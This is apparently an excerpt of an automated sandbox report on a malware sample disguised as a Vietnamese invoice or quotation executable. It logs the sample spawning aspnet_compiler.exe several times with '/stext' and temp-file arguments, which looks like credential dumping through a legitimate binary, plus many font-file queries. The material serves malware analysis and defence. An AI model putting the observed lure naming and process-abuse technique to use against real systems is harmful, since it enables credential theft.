              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: unknown unknownJump to behavior
              Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerF
              Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: aspnet_compiler.exe, 0000000C.00000002.534251158.000000000403F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.534069193.0000000004037000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
